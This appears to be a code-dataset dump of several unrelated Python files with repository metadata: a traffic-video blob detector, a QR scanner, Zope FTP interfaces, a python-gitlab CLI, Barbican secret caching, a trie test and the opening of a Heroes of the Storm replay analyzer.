| 24.740741 | 79 | 0.635729 | 0 | 0 | 0 | 0 | 521 | 0.25998 | 0 | 0 | 549 | 0.273952 |
d3529efe0bf0d6df5975b82e93a399f8498bfad6 | 4,091 | py | Python | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | import os
import cv2
import numpy as np
import time
from backgroundsubtraction.KMeans import KMeans
from objectblob.ObjectBlobDetection import ObjectBlobDetection
from pixelcleaning.MorphologicalCleaning import MorphologicalCleaning
__author__ = 'Luqman'
def morphological(image):
cleaning_model = MorphologicalCleaning()
return cleaning_model
def test(algorithm, vid_src, file_name):
_, frame = vid_src.read()
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
model = KMeans(used_frame, 3)
cleaning_model = algorithm(used_frame)
blob_detection = ObjectBlobDetection(used_frame)
n_frame = 0
image_resolution = (0, 0)
min_fps = -1
max_fps = -1
mean_fps = -1
real_fps = vid_src.get(cv2.cv.CV_CAP_PROP_FPS)
# vid_src.get(cv2.CV_CAP_PROP_FPS)
if not os.path.exists("saved_images/"+file_name):
os.makedirs("saved_images/"+file_name)
os.makedirs("saved_images/"+file_name+"/normal")
os.makedirs("saved_images/"+file_name+"/fg")
os.makedirs("saved_images/"+file_name+"/grayscale")
os.makedirs("saved_images/"+file_name+"/clean")
os.makedirs("saved_images/"+file_name+"/contour")
# applying background detection
while frame is not None:
time_start = time.time()
n_frame += 1
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/normal/"+repr(n_frame)+".jpg", frame)
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
y, x = used_frame.shape
image_resolution = x, y
fg = model.apply(used_frame)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/fg/"+repr(n_frame)+".jpg", fg)
# cv2.imwrite("saved_images/"+file_name+"/grayscale/"+repr(n_frame)+".jpg", used_frame)
fg_use = np.copy(fg)
fg_clean = cleaning_model.apply(fg)
fg_clean_use = np.copy(fg_clean)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/clean/"+repr(n_frame)+".jpg", fg_clean)
# contours
blob_detection.get_contours(fg_clean_use, used_frame)
# cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
frame_with_contours = blob_detection.draw_blobs(frame)
# print len(contours)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/contour/"+repr(n_frame)+".jpg", frame_with_contours)
time_end = time.time()
cv2.imshow('img', frame_with_contours)
cv2.imshow('fg', fg)
cv2.imshow('fg_clean', fg_clean)
# prev_frame = np.copy(frame)
_, frame = vid_src.read()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
time_process = time_end - time_start
cur_fps = 0
if time_process > 0:
cur_fps = 1. / time_process
# set max / min / mean fps
if (cur_fps > max_fps) or (max_fps == -1):
max_fps = cur_fps
if (cur_fps < min_fps) or (min_fps == -1):
min_fps = cur_fps
if mean_fps == -1:
mean_fps = cur_fps
else:
mean_fps = (0.98 * mean_fps) + (0.02 * cur_fps)
print "--- run statistics ---"
print "image resolution: ", image_resolution
print "total frame: ", n_frame
print "min FPS: ", min_fps
print "max FPS: ", max_fps
print "average FPS: ", mean_fps
print "Video FPS: ", real_fps
if __name__ == '__main__':
import sys
if len(sys.argv) >= 2:
video_src_file = sys.argv[1]
if len(sys.argv) >= 3:
exp_file_name = sys.argv[2]
else:
exp_file_name = "default"
else:
video_src_file = 0
exp_file_name = "default"
# run video
vid = cv2.VideoCapture(video_src_file)
test(morphological, vid, exp_file_name)
| 29.431655 | 106 | 0.611831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,222 | 0.298704 |
d353025226f0401e819059c39392882f5cc58fad | 2,439 | py | Python | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | # Imports
import sys, os, time, logging, json
# QR code scanning is on a separate file
from qr import qrscan
# Configuration using config.json
with open('config.json', 'r') as f:
config = json.load(f)
if 'outfile' in config:
outfile = config['outfile']
if 'path' in config:
path = config['path']
extensions = config['extensions']
level = -1
if 'loglevel' in config:
if config['loglevel'] == 'info':
level = logging.INFO
if config['loglevel'] == 'debug':
level = logging.DEBUG
elif config['loglevel'] == 'error':
level = logging.ERROR
if level != -1:
handlers = [logging.StreamHandler(sys.stdout)]
if 'logfile' in config:
handlers.append(logging.FileHandler(filename=config['logfile']))
logging.basicConfig(encoding='utf-8',
level=level, format=config['logformat'],
handlers=handlers)
# Read optional parameters that override config.json
if len(sys.argv) > 2:
path = sys.argv[1]
outfile = sys.argv[2]
elif len(sys.argv) > 1:
path = sys.argv[1]
# File scan function
def filescan(filepath):
try:
if extensions.count(os.path.splitext(filepath)[1].lower()) > 0:
logging.info('Scanning file: %s', filepath)
start = time.time()
codes = qrscan(filepath)
if len(codes) > 0:
logging.info('Found %s code' + ('s' if len(codes) >
1 else '') + ': %s', len(codes), codes)
else:
logging.info('No codes found.')
file_time = time.time() - start
logging.info('Scanned in %ss', round(file_time, 2))
return codes
except Exception as e:
logging.error('Error: %s', e)
# Initiate empty codes list
codes = []
# Start scanning with both single file and directory support, appending to our codes list
if os.path.isfile(path):
filecodes = filescan(path)
codes.append({
'file': path,
'codes': filecodes
})
elif os.path.isdir(path):
start = time.time()
for file in os.listdir(path):
filepath = os.path.join(path, os.fsdecode(file))
filecodes = filescan(filepath)
codes.append({
'file': filepath,
'codes': filecodes
})
logging.info('All scans finished in %ss', round(time.time() - start, 2))
else:
logging.error('Invalid path.')
# Output if codes were found
if len(codes) > 0 and outfile:
with open(outfile, 'w') as out:
json.dump(codes, out, indent=2)
logging.info('Codes available in %s', outfile) | 28.034483 | 89 | 0.633866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 635 | 0.260353 |
d3531e57298807b91066e04d1ce5acf961f78599 | 4,566 | py | Python | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 1 | 2019-12-04T12:52:44.000Z | 2019-12-04T12:52:44.000Z | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 6 | 2017-05-05T11:53:40.000Z | 2020-06-08T13:49:42.000Z | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 2 | 2015-04-03T08:00:16.000Z | 2020-06-09T10:06:15.000Z | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Virtual File System interfaces for the publisher.
$Id$
"""
from zope.publisher.interfaces.ftp import IFTPPublisher, IFTPView
class IFTPDirectoryPublisher(IFTPPublisher, IFTPView):
def type(name):
"""Return the file type at the given name
The return valie is 'd', for a directory, 'f', for a file, and
None if there is no file at the path.
"""
def names(filter=None):
"""Return a sequence of the names in a directory
If the filter is not None, include only those names for which
the filter returns a true value.
"""
def ls(filter=None):
"""Return a sequence of information objects
Return item info objects (see lsinfo) for the files in a directory.
If the filter is not None, include only those names for which
the filter returns a true value.
"""
def readfile(name, outstream, start=0, end=None):
"""Outputs the file at name to a stream.
Data are copied starting from start. If end is not None,
data are copied up to end.
"""
def lsinfo(name):
"""Return information for a unix-style ls listing for the path
Data are returned as a dictionary containing the following keys:
type
The path type, either 'd' or 'f'.
owner_name
Defaults to "na". Must not include spaces.
owner_readable
defaults to True
owner_writable
defaults to True
owner_executable
defaults to True for directories and false otherwise.
group_name
Defaults to "na". Must not include spaces.
group_readable
defaults to True
group_writable
defaults to True
group_executable
defaults to True for directories and false otherwise.
other_readable
defaults to False
other_writable
defaults to False
other_executable
defaults to True for directories and false otherwise.
mtime
Optional time, as a datetime.
nlinks
The number of links. Defaults to 1.
size
The file size. Defaults to 0.
name
The file name.
"""
def mtime(name):
"""Return the modification time for the file
Return None if it is unknown.
"""
def size(name):
"""Return the size of the file at path
"""
def mkdir(name):
"""Create a directory.
"""
def remove(name):
"""Remove a file. Same as unlink.
"""
def rmdir(name):
"""Remove a directory.
"""
def rename(old, new):
"""Rename a file or directory.
"""
def writefile(name, instream, start=None, end=None, append=False):
"""Write data to a file.
If start or end is not None, then only part of the file is
written. The remainder of the file is unchanged.
If start or end are specified, they must ne non-negative.
If end is None, then the file is truncated after the data are
written. If end is not None, parts of the file after end, if
any, are unchanged. If end is not None and there isn't enough
data in instream to fill out the file, then the missing data
are undefined.
If neither start nor end are specified, then the file contents
are overwritten.
If start is specified and the file doesn't exist or is shorter
than start, the file will contain undefined data before start.
If append is true, start and end are ignored.
"""
def writable(name):
"""Return boolean indicating whether a file at path is writable
Note that a true value should be returned if the file doesn't
exist but it's directory is writable.
"""
| 25.50838 | 78 | 0.597678 | 3,792 | 0.830486 | 0 | 0 | 0 | 0 | 0 | 0 | 3,924 | 0.859396 |
d353829766a83bdaaf1d9647932561620e2d8f0c | 49 | py | Python | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | default_app_config='workfolw.apps.WorkfolwConfig' | 49 | 49 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.612245 |
d35417a4cf00badf31eab6d25dadb13c434cb246 | 1,176 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class NamingUtils(object):
""" A collection of utilities related to element naming. """
@staticmethod
def CompareNames(nameA, nameB):
"""
CompareNames(nameA: str,nameB: str) -> int
Compares two object name strings using Revit's comparison rules.
nameA: The first object name to compare.
nameB: The second object name to compare.
Returns: An integer indicating the result of the lexical comparison between the two
names.
Less than zero if nameA comes before nameB in the ordering,zero if
nameA and nameB are equivalent,
and greater than zero if nameA is comes
after nameB in the ordering.
"""
pass
@staticmethod
def IsValidName(string):
"""
IsValidName(string: str) -> bool
Identifies if the input string is valid for use as an object name in Revit.
string: The name to validate.
Returns: True if the name is valid for use as a name in Revit,false if it contains
prohibited characters and is invalid.
"""
pass
__all__ = [
"CompareNames",
"IsValidName",
]
| 21 | 88 | 0.62585 | 1,174 | 0.998299 | 0 | 0 | 991 | 0.842687 | 0 | 0 | 937 | 0.796769 |
d355eb31c252b769e1ab39ae5b0f49c3fa0a1e7d | 1,616 | py | Python | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | 2 | 2022-03-07T17:30:41.000Z | 2022-03-11T00:48:22.000Z | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | null | null | null | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | null | null | null | import cv2
import numpy as np
from rich import print
dewarped = cv2.imread('../dewarped.png')
'''
SIZE = 600
# Get ROI corners
arucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_APRILTAG_36h11)
arucoParams = cv2.aruco.DetectorParameters_create()
(corners, ids, rejected) = cv2.aruco.detectMarkers(image, arucoDict, parameters=arucoParams)
assert len(corners) == len(ids) == 4
detected = [[ids[i], corners[i]] for i in range(4)]
detected.sort(key = lambda x: x[0])
print(detected)
bounding_box = [
detected[0][1][0][2],
detected[1][1][0][3],
detected[2][1][0][0],
detected[3][1][0][1]
]
img_boxed = image.copy()
cv2.polylines(img_boxed, np.int32([bounding_box]), True, (0, 255, 0), 2)
# cv2.imshow('Fiducial Detection', img_boxed)
# Dewarp
vertices = [
[0, 0],
[SIZE, 0],
[SIZE, SIZE],
[0, SIZE]
]
matrix = cv2.getPerspectiveTransform(np.float32(bounding_box), np.float32(vertices))
dewarped = cv2.warpPerspective(image, matrix, (SIZE, SIZE))
cv2.imwrite('dewarped.png', dewarped)
'''
cv2.imshow('Dewarped', dewarped)
# Marker selection
markers = []
def selectMarker(event, x, y, flags, param):
global markers, dewarped
if event == cv2.EVENT_LBUTTONDOWN:
markers.append((x, y))
print(f'Marker {len(markers)} selected at ({x}, {y})')
dewarped = cv2.circle(dewarped, (x,y), radius=5, color=(0, 0, 255), thickness=-1)
if len(markers) == 27:
print('All 27 markers selected')
print(markers)
cv2.imshow('Dewarped', dewarped)
cv2.setMouseCallback('Dewarped', selectMarker)
cv2.waitKey()
cv2.destroyAllWindows() | 27.389831 | 92 | 0.665223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,065 | 0.659035 |
d356028a1d23727819e8b944349fe8854b9a9ae6 | 3,699 | py | Python | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/python
# Copyright (c) 2014 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import trie
class TrieTest(unittest.TestCase):
def MakeUncompressedTrie(self):
uncompressed = trie.Node()
accept = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '2'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '2', '3'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '3'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '4'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '5'], accept)
return uncompressed
def CheckTrieAccepts(self, accept_sequences):
accept = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
self.assertEquals([(accept, ['0', '1', '2']),
(accept, ['0', '1', '2', '3']),
(accept, ['0', '1', '3']),
(accept, ['0', '1', '4']),
(accept, ['0', '1', '5'])],
accept_sequences)
def testTrieAddAndMerge(self):
uncompressed = self.MakeUncompressedTrie()
self.CheckTrieAccepts(trie.GetAllAcceptSequences(uncompressed))
# n0 -0-> n1 -1-> n2 -2-> n3 -3-> n4
# | -3-> n5
# | -4-> n6
# | -5-> n7
self.assertEquals(8, len(trie.GetAllUniqueNodes(uncompressed)))
node_cache = trie.NodeCache()
compressed_trie = node_cache.Merge(node_cache.empty_node, uncompressed)
self.CheckTrieAccepts(trie.GetAllAcceptSequences(compressed_trie))
# (n4, n5. n6, n7) can be grouped together from above
self.assertEquals(5, len(trie.GetAllUniqueNodes(compressed_trie)))
def testTrieSerializationAndDeserialization(self):
uncompressed = self.MakeUncompressedTrie()
node_cache = trie.NodeCache()
compressed_trie = node_cache.Merge(node_cache.empty_node, uncompressed)
reconstructed_trie = trie.TrieFromDict(trie.TrieToDict(compressed_trie),
node_cache)
self.CheckTrieAccepts(trie.GetAllAcceptSequences(reconstructed_trie))
self.assertEquals(5, len(trie.GetAllUniqueNodes(reconstructed_trie)))
def testTrieDiff(self):
trie1 = trie.Node()
trie2 = trie.Node()
accept1 = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
accept2 = trie.AcceptInfo(input_rr='%eax', output_rr='%ecx')
trie.AddToUncompressedTrie(trie1, ['0', '1', '2'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '3'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '4'], accept1)
trie.AddToUncompressedTrie(trie1, ['0', '1', '5'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '2'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '3'], accept1)
trie.AddToUncompressedTrie(trie2, ['0', '1', '4'], accept2)
node_cache = trie.NodeCache()
compressed_trie1 = node_cache.Merge(node_cache.empty_node, trie1)
compressed_trie2 = node_cache.Merge(node_cache.empty_node, trie2)
diffs = set()
compressed_diffs = set()
for diff in trie.DiffTries(trie1, trie2, node_cache.empty_node, ()):
diffs.add(diff)
for diff in trie.DiffTries(compressed_trie1, compressed_trie2,
node_cache.empty_node, ()):
compressed_diffs.add(diff)
self.assertEquals(
diffs,
set([(('0', '1', '4'), accept1, accept2),
(('0', '1', '5'), accept1, None)]))
self.assertEquals(diffs, compressed_diffs)
if __name__ == '__main__':
unittest.main()
| 39.351064 | 76 | 0.634496 | 3,430 | 0.927278 | 0 | 0 | 0 | 0 | 0 | 0 | 593 | 0.160314 |
d356d162a88ba630ab5c48261a45a43472939810 | 6,074 | py | Python | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | null | null | null | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | 6 | 2020-12-17T09:37:03.000Z | 2020-12-18T04:42:23.000Z | venv/lib/python3.7/site-packages/gitlab/cli.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Gauvain Pocentek <gauvain@pocentek.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import functools
import importlib
import re
import sys
import gitlab.config
camel_re = re.compile("(.)([A-Z])")
# custom_actions = {
# cls: {
# action: (mandatory_args, optional_args, in_obj),
# },
# }
custom_actions = {}
def register_custom_action(cls_names, mandatory=tuple(), optional=tuple()):
def wrap(f):
@functools.wraps(f)
def wrapped_f(*args, **kwargs):
return f(*args, **kwargs)
# in_obj defines whether the method belongs to the obj or the manager
in_obj = True
classes = cls_names
if type(cls_names) != tuple:
classes = (cls_names,)
for cls_name in classes:
final_name = cls_name
if cls_name.endswith("Manager"):
final_name = cls_name.replace("Manager", "")
in_obj = False
if final_name not in custom_actions:
custom_actions[final_name] = {}
action = f.__name__.replace("_", "-")
custom_actions[final_name][action] = (mandatory, optional, in_obj)
return wrapped_f
return wrap
def die(msg, e=None):
if e:
msg = "%s (%s)" % (msg, e)
sys.stderr.write(msg + "\n")
sys.exit(1)
def what_to_cls(what):
return "".join([s.capitalize() for s in what.split("-")])
def cls_to_what(cls):
return camel_re.sub(r"\1-\2", cls.__name__).lower()
def _get_base_parser(add_help=True):
parser = argparse.ArgumentParser(
add_help=add_help, description="GitLab API Command Line Interface"
)
parser.add_argument("--version", help="Display the version.", action="store_true")
parser.add_argument(
"-v",
"--verbose",
"--fancy",
help="Verbose mode (legacy format only)",
action="store_true",
)
parser.add_argument(
"-d", "--debug", help="Debug mode (display HTTP requests)", action="store_true"
)
parser.add_argument(
"-c",
"--config-file",
action="append",
help="Configuration file to use. Can be used multiple times.",
)
parser.add_argument(
"-g",
"--gitlab",
help=(
"Which configuration section should "
"be used. If not defined, the default selection "
"will be used."
),
required=False,
)
parser.add_argument(
"-o",
"--output",
help="Output format (v4 only): json|legacy|yaml",
required=False,
choices=["json", "legacy", "yaml"],
default="legacy",
)
parser.add_argument(
"-f",
"--fields",
help=(
"Fields to display in the output (comma "
"separated). Not used with legacy output"
),
required=False,
)
return parser
def _get_parser(cli_module):
parser = _get_base_parser()
return cli_module.extend_parser(parser)
def _parse_value(v):
if isinstance(v, str) and v.startswith("@"):
# If the user-provided value starts with @, we try to read the file
# path provided after @ as the real value. Exit on any error.
try:
with open(v[1:]) as fl:
return fl.read()
except Exception as e:
sys.stderr.write("%s\n" % e)
sys.exit(1)
return v
def main():
if "--version" in sys.argv:
print(gitlab.__version__)
sys.exit(0)
parser = _get_base_parser(add_help=False)
# This first parsing step is used to find the gitlab config to use, and
# load the propermodule (v3 or v4) accordingly. At that point we don't have
# any subparser setup
(options, args) = parser.parse_known_args(sys.argv)
try:
config = gitlab.config.GitlabConfigParser(options.gitlab, options.config_file)
except gitlab.config.ConfigError as e:
if "--help" in sys.argv or "-h" in sys.argv:
parser.print_help()
sys.exit(0)
sys.exit(e)
cli_module = importlib.import_module("gitlab.v%s.cli" % config.api_version)
# Now we build the entire set of subcommands and do the complete parsing
parser = _get_parser(cli_module)
try:
import argcomplete
argcomplete.autocomplete(parser)
except Exception:
pass
args = parser.parse_args(sys.argv[1:])
config_files = args.config_file
gitlab_id = args.gitlab
verbose = args.verbose
output = args.output
fields = []
if args.fields:
fields = [x.strip() for x in args.fields.split(",")]
debug = args.debug
action = args.whaction
what = args.what
args = args.__dict__
# Remove CLI behavior-related args
for item in (
"gitlab",
"config_file",
"verbose",
"debug",
"what",
"whaction",
"version",
"output",
):
args.pop(item)
args = {k: _parse_value(v) for k, v in args.items() if v is not None}
try:
gl = gitlab.Gitlab.from_config(gitlab_id, config_files)
if gl.private_token or gl.oauth_token or gl.job_token:
gl.auth()
except Exception as e:
die(str(e))
if debug:
gl.enable_debug()
cli_module.run(gl, what, action, args, verbose, output, fields)
sys.exit(0)
| 27.484163 | 87 | 0.604873 | 0 | 0 | 0 | 0 | 97 | 0.01597 | 0 | 0 | 2,098 | 0.345407 |
d3570c21033a2353bb799d126f54e1f54457ff8f | 142 | py | Python | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | 1 | 2020-12-09T14:47:13.000Z | 2020-12-09T14:47:13.000Z | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | null | null | null | RandomForestScores_1.py | dgudenius/football_win_predictions_v2 | a95b8a97632d4b9eb42062fe60afdc21eae7c834 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
| 28.4 | 53 | 0.859155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d357eeb1047aa19ccfdf077b0d42dbce4b1b7b39 | 2,882 | py | Python | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 2 | 2019-05-24T08:36:25.000Z | 2019-05-31T17:40:19.000Z | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 1 | 2021-08-31T15:59:27.000Z | 2021-08-31T15:59:27.000Z | deckhand/barbican/cache.py | airshipit/deckhand | 3f4458690ddb424c075891badd5b76c9884cbb9e | [
"Apache-2.0"
] | 4 | 2019-09-19T18:00:54.000Z | 2021-07-19T05:03:18.000Z | # Copyright 2018 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
from oslo_log import log as logging
from deckhand.conf import config
CONF = config.CONF
LOG = logging.getLogger(__name__)
_CACHE_OPTS = {
'cache.type': 'memory',
'expire': CONF.barbican.cache_timeout,
}
_CACHE = CacheManager(**parse_cache_config_options(_CACHE_OPTS))
_BARBICAN_CACHE = _CACHE.get_cache('barbican_cache')
# NOTE(felipemonteiro): The functions below realize a lookup and reverse-lookup
# to allow for much faster retrieval of encrypted data from Barbican, which
# doesn't currently support batched requests in its Secrets API. This behavior
# is necessary since Deckhand has to potentially retrieve and store up to
# dozens of secrets per request. Note that data for both lookup functions
# below are invalidated together, as they are tied to the same cache.
def lookup_by_ref(barbicanclient, secret_ref):
"""Look up secret object using secret reference.
Allows for quick lookup of secret payloads using ``secret_ref`` via
caching.
"""
def do_lookup():
"""Returns secret object stored in Barbican."""
return barbicanclient.call("secrets.get", secret_ref)
if CONF.barbican.enable_cache:
return _BARBICAN_CACHE.get(key=secret_ref, createfunc=do_lookup)
else:
return do_lookup()
def lookup_by_payload(barbicanclient, **kwargs):
"""Look up secret reference using the secret payload.
Allows for quick lookup of secret references using ``secret_payload`` via
caching (essentially a reverse-lookup).
Useful for ensuring that documents with the same secret payload (which
occurs when the same document is recreated across different revisions)
persist the same secret reference in the database -- and thus quicker
future ``lookup_by_ref`` lookups.
"""
def do_lookup():
"""Returns secret Barbican reference."""
secret = barbicanclient.call("secrets.create", **kwargs)
return secret.store()
secret_payload = kwargs['payload']
if CONF.barbican.enable_cache:
return _BARBICAN_CACHE.get(key=secret_payload, createfunc=do_lookup)
else:
return do_lookup()
def invalidate():
_BARBICAN_CACHE.clear()
| 35.580247 | 79 | 0.743928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,811 | 0.628383 |
d359300d89c503491b179cf6b2e189a54cfed309 | 15,572 | py | Python | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | 31 | 2015-01-19T09:42:02.000Z | 2021-01-02T12:42:07.000Z | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | null | null | null | stormreplay/analyzer.py | karlgluck/heroes-of-the-storm-replay-parser | 5dd407e3ce2bd06d1acd279dd85c2a2a924c3c62 | [
"MIT"
] | 9 | 2015-04-02T04:24:54.000Z | 2017-09-08T11:17:19.000Z | import os
import reader
import json
# todo: get this logger from elsewhere
from celery.utils.log import get_task_logger
log = get_task_logger(__name__)
defaultFieldMappings = [
### SET
(['info','protocol'], 'getReplayProtocolVersion'),
(['info','bytes'], 'getReplayFileByteSize'),
(['info','gameloops'], 'getMatchLengthGameloops'),
(['info','seconds'], 'getMatchLengthSeconds'),
(['info','start_timestamp'], 'getMatchUTCTimestamp'),
(['info','speed'], 'getMatchSpeed'),
(['info','match_type'], 'getMatchType'),
(['info','hero_selelection_mode'], 'getHeroSelectionMode'),
(['map','name'], 'getMapName'),
(['map',{'m_mapSizeX':'width', 'm_mapSizeY':'height'}], 'getGameDescription'),
(['team', [], 'levels'], 'getTeamLevels'),
#(['players', [], 'talents'], 'getTalents'),
#(['players', [], 'talents', [], {'name':'name'}], 'getTalents'),
#(['players', [], {'m_teamId': 'team', 'm_name': 'name', 'm_toonId': 'toon_id'}], 'getPlayers'),
(['raw','players'], 'getPlayers'),
(['raw','details'], 'getReplayDetails'),
(['raw','init_data'], 'getReplayInitData'),
#(['raw','translated_attributes_events'], 'getTranslatedReplayAttributesEvents'),
#(['players', [], 'hero'], 'getPlayersHeroChoiceArray'),
]
named_field_mappings = {
'RawReplayDetails': [(['raw','details'], 'getReplayDetails')],
